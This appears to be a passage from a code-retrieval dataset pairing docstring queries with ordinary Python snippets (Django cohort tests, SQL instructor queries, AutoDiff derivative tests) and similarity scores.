"def test_cohort_list(self, client, user):\n assign_perm('release.view_releasecohort', user)\n client.force_login(user)\n url = reverse('cohort_list')\n response = client.get(url)\n\n assert response.status_code == 200",
"def create_cohort_list(cohorts):\n condensedCohorts = set()\n for coh in cohorts:\n condensedCohorts.add(coh.cid)\n\n structuredResponse = []\n for coh in condensedCohorts:\n new_dict = dict()\n new_dict['cohortId'] = coh.cid\n new_dict['paper'] = coh.paper\n new_dict['text'] = coh.text\n new_dict['email'] = coh.email\n structuredResponse.append(new_dict)\n return structuredResponse",
"def _cohorts(self):\n return ['parentsALL']",
"def all_instructors(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Instructor(\n row[1], row[2], row[6], row[6], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.FirstName,\n i.LastName,\n i.SlackHandle,\n i.CohortId,\n i.Specialty,\n c.Name\n from Instructor i\n join Cohort c on i.CohortId = c.Id\n order by i.CohortId\n \"\"\")\n\n all_instructors = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for instructor in all_instructors:\n print(instructor)",
"def test_cohort_data():\n app = bitool.app.test_client()\n resp = app.get(API_URL + cohort_data + no_chache, follow_redirects=True)\n assert (resp.status_code == 200)\n data = json.loads(resp.data)\n calculated_users = sum([x[1] for x in data['report']['data']])\n sum_users = data['sum']['data'][0][0]\n assert (calculated_users == sum_users)",
"def get_administerable_studies_by_name():\n researcher_admin = get_session_researcher()\n if researcher_admin.site_admin:\n studies = Study.get_all_studies_by_name()\n else:\n studies = researcher_admin.get_administered_studies_by_name()\n return studies",
"def test_cohort_detail(self, client, user, cohort):\n assign_perm('release.view_releasecohort', user)\n client.force_login(user)\n url = reverse('cohort_detail', kwargs={'cohort_id': cohort.id})\n response = client.get(url)\n\n assert response.status_code == 200",
"def get_student():\n\n github = request.args.get('github', 'jhacks')\n first, last, github = hackbright.get_student_by_github(github)\n\n\n rows = hackbright.list_projects(github)\n\n return render_template (\"student_info.html\",\n first=first,\n last=last,\n github=github,\n rows=rows\n )",
"def get_cohort_by_id(course_key, cohort_id):\r\n return CourseUserGroup.objects.get(\r\n course_id=course_key,\r\n group_type=CourseUserGroup.COHORT,\r\n id=cohort_id\r\n )",
"def students(self):\n\t\treturn self.grade_set.all().distinct()",
"def get_all_students(hospital_codes, results_codes):\n data = pd.read_csv(\"res/Internship Lottery_April 8, 2018_11.54_correct encoding.csv\", encoding='iso-8859-8')\n students = []\n for i in range(2, 241):\n student = get_student(i + 2, data.iloc[i], hospital_codes, results_codes)\n if student is not None:\n students.append(student)\n\n return students",
"def get_students(self):\n dist_on_foot = db.session.query(Activity.user_id.label('user_id'),\n func.sum(Activity.distance).label('on_foot')). \\\n filter(func.date(Activity.datetime) >= self.SEASON.start_date,\n func.date(Activity.datetime) <= self.SEASON.end_date,\n Activity.type.in_([ActivityType.Run, ActivityType.Walk])). \\\n group_by(Activity.user_id). \\\n subquery(with_labels=True)\n dist_on_bike = db.session.query(Activity.user_id.label('user_id'),\n func.sum(Activity.distance).label('on_bike')). \\\n filter(func.date(Activity.datetime) >= self.SEASON.start_date,\n func.date(Activity.datetime) <= self.SEASON.end_date,\n Activity.type.in_([ActivityType.Ride])). \\\n group_by(Activity.user_id). \\\n subquery(with_labels=True)\n data = db.session.query(User, dist_on_foot.c.on_foot, dist_on_bike.c.on_bike). \\\n select_from(User). \\\n outerjoin(dist_on_foot, User.id == dist_on_foot.c.user_id). \\\n outerjoin(dist_on_bike, User.id == dist_on_bike.c.user_id). \\\n filter(User.type == UserType.Student). \\\n order_by(User.last_name.asc(), User.first_name.asc())\n\n result = []\n for row in data:\n on_foot = row.on_foot or 0\n on_bike = row.on_bike or 0\n item = {\n 'name': row.User.first_name + ' ' + row.User.last_name,\n 'uk id': row.User.uk_id,\n 'on foot': round(on_foot, 1),\n 'on bike': round(on_bike, 1),\n 'points': round(on_foot + on_bike / 2, 2)\n }\n result.append(item)\n return result"
] |
[
"0.71378833",
"0.67550665",
"0.64338416",
"0.63730395",
"0.6308023",
"0.62971675",
"0.6139126",
"0.60914844",
"0.6068271",
"0.59822506",
"0.5776066",
"0.5736336",
"0.57326674",
"0.5610465",
"0.5608977",
"0.5501538",
"0.54608333",
"0.54211247",
"0.54135907",
"0.54071593",
"0.5391659",
"0.53636146",
"0.5330731",
"0.53210586",
"0.5290948",
"0.52627915",
"0.51972055",
"0.51875633",
"0.5167351",
"0.51581186"
] |
0.706303
|
1
|
Boolean condition asserts that value and derivative of cosine of the AutoDiff instance are equal to the expected value and derivative as calculated in the function for the case in which x is a real number. RETURNS ======== If the boolean condition returns True nothing is returned. If it is computed to be false, then an AssertionError is raised.
|
def test_cos_con():
c=14
assert {'diff':EF.cos(c).der, 'value': EF.cos(c).val}=={'diff':0, 'value': math.cos(c)}
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_arccos():\n c=0.5\n def myfunc(x):\n f1=EF.arccos(x)\n return f1\n\n f_obj=ADiff(myfunc)\n res=f_obj.Jac(c)\n expectAns={'diff':-1/math.sqrt(1-c**2), 'value':math.acos(c)}\n assert res==expectAns",
"def checkFloat(comment, value, expected, tol=1e-10, update=True):\n if np.isnan(value) and np.isnan(expected):\n res = True\n elif np.isnan(value) or np.isnan(expected):\n res = False\n else:\n res = abs(value - expected) <= tol\n if update:\n if not res:\n print(\"checking float\",comment,'|',value,\"!=\",expected)\n results[\"fail\"] += 1\n else:\n results[\"pass\"] += 1\n return res",
"def test_eq():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.sin(x) + fwd.cos(y)\n g = fwd.sin(x) + fwd.cos(y)\n h = fwd.sin(y) + fwd.cos(x)\n assert f == g\n assert f != h",
"def test_cos():\n c=14\n def myfunc(x):\n f1=EF.cos(x)\n return f1\n\n f_obj=ADiff(myfunc)\n res=f_obj.Jac(c)\n\n expectAns={'diff': -math.sin(c), 'value': math.cos(c)}\n\n assert res==expectAns",
"def test_cot():\n c=0.5\n\n def myfunc(x):\n f1=EF.cot(x)\n return f1\n\n f_obj=ADiff(myfunc)\n res=f_obj.Jac(c)\n expectAns={'diff':2/(math.cos(c*2)-1), 'value':math.cos(c)/math.sin(c)}\n assert res==expectAns",
"def fp_eq(x: float, y: float) -> bool:\n return fabs(x-y) < 10**-12",
"def expected_value_test_3(self):\n\n c = 10\n fun = self.x_ev.add(c)\n\n res_x_c = self.X_dist.expectedValue(self.x_ev) + c\n res_xc = self.X_dist.expectedValue(fun)\n assert_almost_equal(res_x_c, res_xc)",
"def test_cos_2ndord():\n # one variable\n x = fwd.Variable()\n f = fwd.cos(x)\n assert equals(f.derivative_at(x, {x: 1.0}, order=2), -np.cos(1.0))\n # two variables\n x, y = fwd.Variable(), fwd.Variable()\n g = fwd.cos(x*y)\n assert equals(g.derivative_at(x, {x:1.0, y: 2.0}, order=2), \n -2.0**2 * np.cos(2.0))\n # test error raising\n with pytest.raises(NotImplementedError):\n g.derivative_at(x, {x:1.0, y: 2.0}, order=3)",
"def __eq__(self, value):\n return self.real != value",
"def deviation_ok(norm, value, epsilon):\n deviation = abs(norm-value)/norm\n # print(abs(d-epsilon))\n return deviation <= epsilon",
"def test_trig_functions(self):\r\n\r\n angles = ['-pi/4', '0', 'pi/6', 'pi/5', '5*pi/4', '9*pi/4', '1 + j']\r\n sin_values = [-0.707, 0, 0.5, 0.588, -0.707, 0.707, 1.298 + 0.635j]\r\n cos_values = [0.707, 1, 0.866, 0.809, -0.707, 0.707, 0.834 - 0.989j]\r\n tan_values = [-1, 0, 0.577, 0.727, 1, 1, 0.272 + 1.084j]\r\n # Cannot test tan(pi/2) b/c pi/2 is a float and not precise...\r\n\r\n self.assert_function_values('sin', angles, sin_values)\r\n self.assert_function_values('cos', angles, cos_values)\r\n self.assert_function_values('tan', angles, tan_values)\r\n\r\n # Include those where the real part is between -pi/2 and pi/2\r\n arcsin_inputs = ['-0.707', '0', '0.5', '0.588', '1.298 + 0.635*j']\r\n arcsin_angles = [-0.785, 0, 0.524, 0.629, 1 + 1j]\r\n self.assert_function_values('arcsin', arcsin_inputs, arcsin_angles)\r\n # Rather than a complex number, numpy.arcsin gives nan\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arcsin(-1.1)')))\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arcsin(1.1)')))\r\n\r\n # Include those where the real part is between 0 and pi\r\n arccos_inputs = ['1', '0.866', '0.809', '0.834-0.989*j']\r\n arccos_angles = [0, 0.524, 0.628, 1 + 1j]\r\n self.assert_function_values('arccos', arccos_inputs, arccos_angles)\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arccos(-1.1)')))\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arccos(1.1)')))\r\n\r\n # Has the same range as arcsin\r\n arctan_inputs = ['-1', '0', '0.577', '0.727', '0.272 + 1.084*j']\r\n arctan_angles = arcsin_angles\r\n self.assert_function_values('arctan', arctan_inputs, arctan_angles)",
"def test():\n Z = func.evaluate_circuit(F, e_x, e_y, e_xor)\n if Z == d[0]:\n return 0\n elif Z == d[1]:\n return 1",
"def __ne__(self, value):\n return self.real == value",
"def test_potential_differences(self):\n t, x_n, x_p = self.t, self.x_n, self.x_p\n\n np.testing.assert_array_almost_equal(\n self.phi_s_n(t, x_n) - self.phi_e_n(t, x_n), self.delta_phi_n(t, x_n)\n )\n np.testing.assert_array_almost_equal(\n self.phi_s_p(t, x_p) - self.phi_e_p(t, x_p),\n self.delta_phi_p(t, x_p),\n decimal=5,\n )",
"def eq(a, b):\n return abs(a - b) < .05",
"def test_circumference():\n assert func1.circumference_circle(1) == 2 * np.pi, \"returns pi *2\"\n assert func1.circumference_circle(0) == 0, \"is 0\"\n assert func1.circumference_circle(10) == 2 * np.pi * 10",
"def test_comp_angle_wind_eq(self, test_dict):\n test_obj = test_dict[\"test_obj\"]\n result = test_obj.slot.comp_angle_wind_eq()\n\n a = result\n b = test_dict[\"Aw\"]\n msg = \"Return \" + str(a) + \" expected \" + str(b)\n self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)",
"def test_circumference():\n assert func_difficult.circumference_circle(1) == 2 * np.pi, \"returns pi *2\"\n assert func_difficult.circumference_circle(0) == 0, \"is 0\"\n assert func_difficult.circumference_circle(10) == 2 * np.pi * 10",
"def test_invalid_derivative_error(self):\r\n with pytest.raises(ValueError, match=\"n must be a positive integer\"):\r\n finite_diff_coeffs(0, 1, 1)\r\n\r\n with pytest.raises(ValueError, match=\"n must be a positive integer\"):\r\n finite_diff_coeffs(1.3, 1, 1)",
"def test_dixon_price(self):\n fun = get_problem('dixon_price', 2, -10, 10)\n solution = np.array([1.0, 0.70710678])\n self.assertAlmostEqual(fun(solution), 0.0)",
"def test_diferencia_porcentual_igual(self):\r\n valorNuevo = 10\r\n valorAnterior = 10\r\n self.assertEqual(diferenciaPorcentual(valorNuevo, valorAnterior), 0)",
"def test_real(self):\n\n real = common_math.real\n\n self.assertTrue(real(3.75) + real(4.75) == real(8.5))\n self.assertTrue(real(2.5) * real(-1.5) == -real(3.75))\n\n pi_1 = to_real(real, Fraction(311, 99))\n pi_2 = to_real(real, Fraction(333, 106))\n pi_3 = to_real(real, Fraction(355, 113))\n\n self.assertTrue(pi_1 < pi_2)\n self.assertTrue(pi_2 < pi_3)",
"def is_cis(self):\n prev_res = self.get_offset_residue(-1)\n if prev_res is None:\n return None\n\n prev_omega = prev_res.calc_torsion_omega()\n if prev_omega is None:\n return None\n\n if abs(prev_omega) <= (math.pi/2.0):\n return True\n\n return False",
"def assert_true_iff(self, expression, predicate):\n\n if predicate:\n assert expression\n else:\n assert not expression",
"def __call__(self): # run test\n\n try: # Check if any errors were raised during calling of self.func\n return abs(self.func(*self.args, **self.kwargs) - self.res) < self._tolerance\n\n except IndexError:\n return False",
"def test_evaluate_is_of_expression(self):\n value = self.evaluate_common(\"isof(2D,'Edm.Double')\")\n self.assertTrue(\n value.type_code == edm.SimpleType.Boolean, \"Expected Boolean\")\n self.assertTrue(value.value is True, \"Expected True\")\n value = self.evaluate_common(\"isof(2M,'Edm.Double')\")\n self.assertTrue(value.value is True, \"Expected True\")\n value = self.evaluate_common(\"isof(2,'Edm.Double')\")\n self.assertTrue(value.value is True, \"Expected True\")\n value = self.evaluate_common(\"isof(2.0D,'Edm.Single')\")\n self.assertTrue(value.value is False, \"Expected False\")\n value = self.evaluate_common(\"isof('x','Edm.String')\")\n self.assertTrue(value.value is True, \"Expected True\")\n value = self.evaluate_common(\"isof(X'DEAD','Edm.String')\")\n self.assertTrue(value.value is False, \"Expected False\")\n value = self.evaluate_common(\"isof(false or true,'Edm.Boolean')\")\n self.assertTrue(value.value is True, \"Expected True\")\n value = self.evaluate_common(\"isof(null,'Edm.String')\")\n self.assertTrue(value.value is False, \"Expected False\")\n value = self.evaluate_common(\"isof('Edm.String')\")\n self.assertTrue(value.value is False, \"Expected False\")",
"def test_check_result_with_expectation(self):\n pd_single = norm(0, 1)\n pd = [pd_single]\n meas = [-1]\n\n [meancrign, singlecrign] = crign.crign(pd, meas)\n\n # computation by hand\n # integrate from -inf to current measurement\n fixCdfL = lambda x: np.log(np.abs(pd_single.cdf(x) - 1))\n S1 = integrate.quad(fixCdfL, -np.inf, meas[0])\n\n # integrate from measurement to inf\n fixCdfU = lambda x: np.log(np.abs(pd_single.cdf(x) - 0))\n S2 = integrate.quad(fixCdfU, meas[0], np.inf)\n\n singlecrign2 = -(S1[0] + S2[0])\n assert_equal(meancrign, singlecrign2, msg=\"CRIGN values should be equal.\")",
"def double(self):\n if self.__valeur1 == self.__valeur2:\n return True\n else:\n return False",
"def test_divide_constant():\n x = fwd.Variable()\n assert equals((x/2.0).derivative_at(x,{x:3.0}), 0.5)\n assert equals((2.0/x).derivative_at(x,{x:3.0}), -2/9.0)",
"def not_equals_success_func(target, result):\n if result is None:\n return False\n return target != result"
] |
[
"0.619214",
"0.61027396",
"0.60238",
"0.60212696",
"0.58170915",
"0.57943696",
"0.5740132",
"0.57104975",
"0.5706199",
"0.56809705",
"0.56070656",
"0.5600859",
"0.554108",
"0.5490728",
"0.545431",
"0.54504",
"0.5438208",
"0.5426342",
"0.54098964",
"0.54043466",
"0.5397096",
"0.5382717",
"0.53745",
"0.5352597",
"0.5343112",
"0.53100544",
"0.53008217",
"0.52898705",
"0.5276003",
"0.5263259"
] |
0.6238311
|
0
|
Boolean condition asserts that value and derivative of the cotangent of the AutoDiff instance are equal to the expected value and derivative as calculated in the function. RETURNS ======== If the boolean condition returns True nothing is returned. If it is computed to be false, then an AssertionError is raised.
|
def test_cot():
c=0.5
def myfunc(x):
f1=EF.cot(x)
return f1
f_obj=ADiff(myfunc)
res=f_obj.Jac(c)
expectAns={'diff':2/(math.cos(c*2)-1), 'value':math.cos(c)/math.sin(c)}
assert res==expectAns
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def eq(a, b):\n return abs(a - b) < .05",
"def test_diferencia_porcentual_igual(self):\r\n valorNuevo = 10\r\n valorAnterior = 10\r\n self.assertEqual(diferenciaPorcentual(valorNuevo, valorAnterior), 0)",
"def test_potential_differences(self):\n t, x_n, x_p = self.t, self.x_n, self.x_p\n\n np.testing.assert_array_almost_equal(\n self.phi_s_n(t, x_n) - self.phi_e_n(t, x_n), self.delta_phi_n(t, x_n)\n )\n np.testing.assert_array_almost_equal(\n self.phi_s_p(t, x_p) - self.phi_e_p(t, x_p),\n self.delta_phi_p(t, x_p),\n decimal=5,\n )",
"def checkFloat(comment, value, expected, tol=1e-10, update=True):\n if np.isnan(value) and np.isnan(expected):\n res = True\n elif np.isnan(value) or np.isnan(expected):\n res = False\n else:\n res = abs(value - expected) <= tol\n if update:\n if not res:\n print(\"checking float\",comment,'|',value,\"!=\",expected)\n results[\"fail\"] += 1\n else:\n results[\"pass\"] += 1\n return res",
"def test_eq():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.sin(x) + fwd.cos(y)\n g = fwd.sin(x) + fwd.cos(y)\n h = fwd.sin(y) + fwd.cos(x)\n assert f == g\n assert f != h",
"def test_comp_angle_wind_eq(self, test_dict):\n test_obj = test_dict[\"test_obj\"]\n result = test_obj.slot.comp_angle_wind_eq()\n\n a = result\n b = test_dict[\"Aw\"]\n msg = \"Return \" + str(a) + \" expected \" + str(b)\n self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)",
"def test_dg_dT(self):\n dfn = lambda x: self.model.g(self.s, self.e, self.t, x)\n nderiv = differentiate(dfn, self.T)\n cderiv = self.model.dg_dT(self.s, self.e, self.t, self.T)\n if np.isclose(cderiv, 0.0):\n self.assertTrue(True) # This just means I don't care\n else:\n self.assertTrue(np.isclose(nderiv, cderiv))",
"def assert_almost_equal(self, val1, val2, delta):\n return self.assertTrue(\n 0 <= abs(val1 - val2) <= delta,\n \"Absolute difference of {} and {} ({}) is not within {}\".format(\n val1,\n val2,\n abs(val1-val2),\n delta,\n ),\n )",
"def test_eq():\n\n def myfunc1(x,y):\n f1=1*x*y*2\n return f1\n\n def myfunc2(x,y):\n f1=1*x*y*4\n return f1\n\n f_obj1=ADiff(myfunc1)\n res1 = f_obj1 == f_obj1\n f_obj2=ADiff(myfunc2)\n res2 = f_obj1 == f_obj2\n\n assert res1==True and res2==False",
"def fp_eq(x: float, y: float) -> bool:\n return fabs(x-y) < 10**-12",
"def expected_value_test_3(self):\n\n c = 10\n fun = self.x_ev.add(c)\n\n res_x_c = self.X_dist.expectedValue(self.x_ev) + c\n res_xc = self.X_dist.expectedValue(fun)\n assert_almost_equal(res_x_c, res_xc)",
"def deviation_ok(norm, value, epsilon):\n deviation = abs(norm-value)/norm\n # print(abs(d-epsilon))\n return deviation <= epsilon",
"def is_almost_equal(self, x ,y ,epsilon=1*10**(-8)):\n \treturn abs(x-y) <= epsilon",
"def test():\n Z = func.evaluate_circuit(F, e_x, e_y, e_xor)\n if Z == d[0]:\n return 0\n elif Z == d[1]:\n return 1",
"def __eq__(self, value):\n return self.real != value",
"def not_equals_success_func(target, result):\n if result is None:\n return False\n return target != result",
"def _almost_coincident(a,b, rtol=RTOL, atol=ATOL):\n return (np.allclose(a, b, rtol=RTOL, atol=ATOL)\n or np.allclose(np.flipud(a),b, rtol=RTOL, atol=ATOL))",
"def test_value_change(self):\n before = self.data.diffusion_data[:, :, 0, 0]\n after = module_05.run_module(self.data).diffusion_data[:, :, 0, 0]\n self.assertFalse(np.all(before == after))",
"def consistent(self):\n if self.var1.get_value() is None or self.var2.get_value() is None:\n return True\n\n return self.var1.value != self.var2.value",
"def expected_value(expected, actual):\n assert expected == actual",
"def test_t(self):\n assert np.isclose(self.stepper.t, self.final_t)",
"def test_arccos():\n c=0.5\n def myfunc(x):\n f1=EF.arccos(x)\n return f1\n\n f_obj=ADiff(myfunc)\n res=f_obj.Jac(c)\n expectAns={'diff':-1/math.sqrt(1-c**2), 'value':math.acos(c)}\n assert res==expectAns",
"def test_calculate_contract_fee(a, b, expected):\n assert calculate_contract_fee(a, b) == expected",
"def test_delta_val2(self):\n d = Delta(\"+2.5-1.5\")\n self.assertEqual(d.cmp(0, 1), False)\n self.assertEqual(d.cmp(1, 3), False)\n self.assertEqual(d.cmp(3, 1), True)",
"def test_delta_val(self):\n d = Delta(\"+-3\")\n self.assertEqual(d.cmp(0, 1), False)\n self.assertEqual(d.cmp(1, 4), False)\n self.assertEqual(d.cmp(1, 5), True)",
"def satisfied(self):\n\n if self.var1.get_value() is None or self.var2.get_value() is None:\n return False\n\n return self.var1.get_value() != self.var2.get_value()",
"def test_dg_dt(self):\n dfn = lambda x: self.model.g(self.s, self.e, x, self.T)\n nderiv = differentiate(dfn, self.t)\n cderiv = self.model.dg_dt(self.s, self.e, self.t, self.T)\n self.assertTrue(np.isclose(nderiv, cderiv))",
"def _almost_equal(x, y):\n pass",
"def equals_exact(self, other, tolerance): # -> bool:\n ...",
"def almost_equals(self, other, decimal=...): # -> bool:\n ..."
] |
[
"0.58552843",
"0.5829446",
"0.5812231",
"0.5791843",
"0.57855046",
"0.57324314",
"0.5686355",
"0.56789756",
"0.5673521",
"0.5671666",
"0.56386083",
"0.56118995",
"0.56100917",
"0.5604398",
"0.55884665",
"0.5584099",
"0.5578517",
"0.5570114",
"0.5569593",
"0.5566972",
"0.5565048",
"0.55641246",
"0.55276966",
"0.54679626",
"0.5465824",
"0.54650784",
"0.5460181",
"0.5416084",
"0.5413459",
"0.54118943"
] |
0.5946147
|
0
|
Boolean condition asserts that value and derivative of the inverse of cosine of the AutoDiff instance are equal to the expected value and derivative as calculated in the function. RETURNS ======== If the boolean condition returns True nothing is returned. If it is computed to be false, then an AssertionError is raised.
|
def test_arccos():
c=0.5
def myfunc(x):
f1=EF.arccos(x)
return f1
f_obj=ADiff(myfunc)
res=f_obj.Jac(c)
expectAns={'diff':-1/math.sqrt(1-c**2), 'value':math.acos(c)}
assert res==expectAns
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_eq():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.sin(x) + fwd.cos(y)\n g = fwd.sin(x) + fwd.cos(y)\n h = fwd.sin(y) + fwd.cos(x)\n assert f == g\n assert f != h",
"def test_cos_con():\n c=14\n assert {'diff':EF.cos(c).der, 'value': EF.cos(c).val}=={'diff':0, 'value': math.cos(c)}",
"def test_cos():\n c=14\n def myfunc(x):\n f1=EF.cos(x)\n return f1\n\n f_obj=ADiff(myfunc)\n res=f_obj.Jac(c)\n\n expectAns={'diff': -math.sin(c), 'value': math.cos(c)}\n\n assert res==expectAns",
"def checkFloat(comment, value, expected, tol=1e-10, update=True):\n if np.isnan(value) and np.isnan(expected):\n res = True\n elif np.isnan(value) or np.isnan(expected):\n res = False\n else:\n res = abs(value - expected) <= tol\n if update:\n if not res:\n print(\"checking float\",comment,'|',value,\"!=\",expected)\n results[\"fail\"] += 1\n else:\n results[\"pass\"] += 1\n return res",
"def test_cot():\n c=0.5\n\n def myfunc(x):\n f1=EF.cot(x)\n return f1\n\n f_obj=ADiff(myfunc)\n res=f_obj.Jac(c)\n expectAns={'diff':2/(math.cos(c*2)-1), 'value':math.cos(c)/math.sin(c)}\n assert res==expectAns",
"def fp_eq(x: float, y: float) -> bool:\n return fabs(x-y) < 10**-12",
"def eq(a, b):\n return abs(a - b) < .05",
"def test_diferencia_porcentual_igual(self):\r\n valorNuevo = 10\r\n valorAnterior = 10\r\n self.assertEqual(diferenciaPorcentual(valorNuevo, valorAnterior), 0)",
"def test():\n Z = func.evaluate_circuit(F, e_x, e_y, e_xor)\n if Z == d[0]:\n return 0\n elif Z == d[1]:\n return 1",
"def test_comp_angle_wind_eq(self, test_dict):\n test_obj = test_dict[\"test_obj\"]\n result = test_obj.slot.comp_angle_wind_eq()\n\n a = result\n b = test_dict[\"Aw\"]\n msg = \"Return \" + str(a) + \" expected \" + str(b)\n self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)",
"def test_cos_2ndord():\n # one variable\n x = fwd.Variable()\n f = fwd.cos(x)\n assert equals(f.derivative_at(x, {x: 1.0}, order=2), -np.cos(1.0))\n # two variables\n x, y = fwd.Variable(), fwd.Variable()\n g = fwd.cos(x*y)\n assert equals(g.derivative_at(x, {x:1.0, y: 2.0}, order=2), \n -2.0**2 * np.cos(2.0))\n # test error raising\n with pytest.raises(NotImplementedError):\n g.derivative_at(x, {x:1.0, y: 2.0}, order=3)",
"def assert_true_iff(self, expression, predicate):\n\n if predicate:\n assert expression\n else:\n assert not expression",
"def expected_value_test_3(self):\n\n c = 10\n fun = self.x_ev.add(c)\n\n res_x_c = self.X_dist.expectedValue(self.x_ev) + c\n res_xc = self.X_dist.expectedValue(fun)\n assert_almost_equal(res_x_c, res_xc)",
"def not_equals_success_func(target, result):\n if result is None:\n return False\n return target != result",
"def __eq__(self, value):\n return self.real != value",
"def test_potential_differences(self):\n t, x_n, x_p = self.t, self.x_n, self.x_p\n\n np.testing.assert_array_almost_equal(\n self.phi_s_n(t, x_n) - self.phi_e_n(t, x_n), self.delta_phi_n(t, x_n)\n )\n np.testing.assert_array_almost_equal(\n self.phi_s_p(t, x_p) - self.phi_e_p(t, x_p),\n self.delta_phi_p(t, x_p),\n decimal=5,\n )",
"def test_eq():\n\n def myfunc1(x,y):\n f1=1*x*y*2\n return f1\n\n def myfunc2(x,y):\n f1=1*x*y*4\n return f1\n\n f_obj1=ADiff(myfunc1)\n res1 = f_obj1 == f_obj1\n f_obj2=ADiff(myfunc2)\n res2 = f_obj1 == f_obj2\n\n assert res1==True and res2==False",
"def deviation_ok(norm, value, epsilon):\n deviation = abs(norm-value)/norm\n # print(abs(d-epsilon))\n return deviation <= epsilon",
"def __ne__(self, value):\n return self.real == value",
"def test_trig_functions(self):\r\n\r\n angles = ['-pi/4', '0', 'pi/6', 'pi/5', '5*pi/4', '9*pi/4', '1 + j']\r\n sin_values = [-0.707, 0, 0.5, 0.588, -0.707, 0.707, 1.298 + 0.635j]\r\n cos_values = [0.707, 1, 0.866, 0.809, -0.707, 0.707, 0.834 - 0.989j]\r\n tan_values = [-1, 0, 0.577, 0.727, 1, 1, 0.272 + 1.084j]\r\n # Cannot test tan(pi/2) b/c pi/2 is a float and not precise...\r\n\r\n self.assert_function_values('sin', angles, sin_values)\r\n self.assert_function_values('cos', angles, cos_values)\r\n self.assert_function_values('tan', angles, tan_values)\r\n\r\n # Include those where the real part is between -pi/2 and pi/2\r\n arcsin_inputs = ['-0.707', '0', '0.5', '0.588', '1.298 + 0.635*j']\r\n arcsin_angles = [-0.785, 0, 0.524, 0.629, 1 + 1j]\r\n self.assert_function_values('arcsin', arcsin_inputs, arcsin_angles)\r\n # Rather than a complex number, numpy.arcsin gives nan\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arcsin(-1.1)')))\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arcsin(1.1)')))\r\n\r\n # Include those where the real part is between 0 and pi\r\n arccos_inputs = ['1', '0.866', '0.809', '0.834-0.989*j']\r\n arccos_angles = [0, 0.524, 0.628, 1 + 1j]\r\n self.assert_function_values('arccos', arccos_inputs, arccos_angles)\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arccos(-1.1)')))\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arccos(1.1)')))\r\n\r\n # Has the same range as arcsin\r\n arctan_inputs = ['-1', '0', '0.577', '0.727', '0.272 + 1.084*j']\r\n arctan_angles = arcsin_angles\r\n self.assert_function_values('arctan', arctan_inputs, arctan_angles)",
"def expected_value(expected, actual):\n assert expected == actual",
"def test_efunc_vs_invefunc(self, cosmo):\n # super().test_efunc_vs_invefunc(cosmo) # NOT b/c abstract `w(z)`\n z0 = 0.5\n z = np.array([0.5, 1.0, 2.0, 5.0])\n\n assert np.allclose(cosmo.efunc(z0), 1.0 / cosmo.inv_efunc(z0))\n assert np.allclose(cosmo.efunc(z), 1.0 / cosmo.inv_efunc(z))",
"def test_value_change(self):\n before = self.data.diffusion_data[:, :, 0, 0]\n after = module_05.run_module(self.data).diffusion_data[:, :, 0, 0]\n self.assertFalse(np.all(before == after))",
"def test_circumference():\n assert func1.circumference_circle(1) == 2 * np.pi, \"returns pi *2\"\n assert func1.circumference_circle(0) == 0, \"is 0\"\n assert func1.circumference_circle(10) == 2 * np.pi * 10",
"def fequal(pos_act, pos_exp, eps=1e-5):\n return abs(pos_act - pos_exp) < eps",
"def eq(self, y):\n return 1 - self.ne(y)",
"def test_function(self):\n # almost spherical case\n x = 1.\n y = 1.\n e1, e2 = 5e-5, 0.\n sigma = 1.\n amp = 2.\n\n f_ = self.gaussian_kappa_ellipse.function(x, y, amp, sigma, e1, e2)\n\n r2 = x*x + y*y\n f_sphere = amp/(2.*np.pi*sigma**2) * sigma**2 * (np.euler_gamma -\n expi(-r2/2./sigma**2) + np.log(r2/2./sigma**2))\n\n npt.assert_almost_equal(f_, f_sphere, decimal=4)\n\n # spherical case\n e1, e2 = 0., 0.\n f_ = self.gaussian_kappa_ellipse.function(x, y, amp, sigma, e1, e2)\n\n npt.assert_almost_equal(f_, f_sphere, decimal=4)",
"def test_t(self):\n assert np.isclose(self.stepper.t, self.final_t)",
"def test_dixon_price(self):\n fun = get_problem('dixon_price', 2, -10, 10)\n solution = np.array([1.0, 0.70710678])\n self.assertAlmostEqual(fun(solution), 0.0)",
"def test_correct_value(self):\n self.assertTrue(py_function(6) == 36)\n self.assertFalse(py_function(5) == 9)\n for i in range(0, 10):\n self.assertTrue(py_function(i) == i**2 if i != 0 else 100)"
] |
[
"0.62694824",
"0.6028754",
"0.5948653",
"0.5861675",
"0.58350295",
"0.5788916",
"0.57730377",
"0.5752578",
"0.5752459",
"0.57305455",
"0.5655151",
"0.56550866",
"0.56306046",
"0.5619683",
"0.5585245",
"0.55714893",
"0.5554394",
"0.554997",
"0.554327",
"0.5509602",
"0.54968166",
"0.5487454",
"0.54648757",
"0.54583013",
"0.54456913",
"0.54434377",
"0.5418939",
"0.54070866",
"0.5402034",
"0.5397404"
] |
0.6100563
|
1
|
Returns the euclidean distance between two User vertices.
|
def euclidean_distance(user1: User, user2: User) -> float:
common_animes = set.intersection(set(user1.neighbor_anime.keys()),
set(user2.neighbor_anime.keys()))
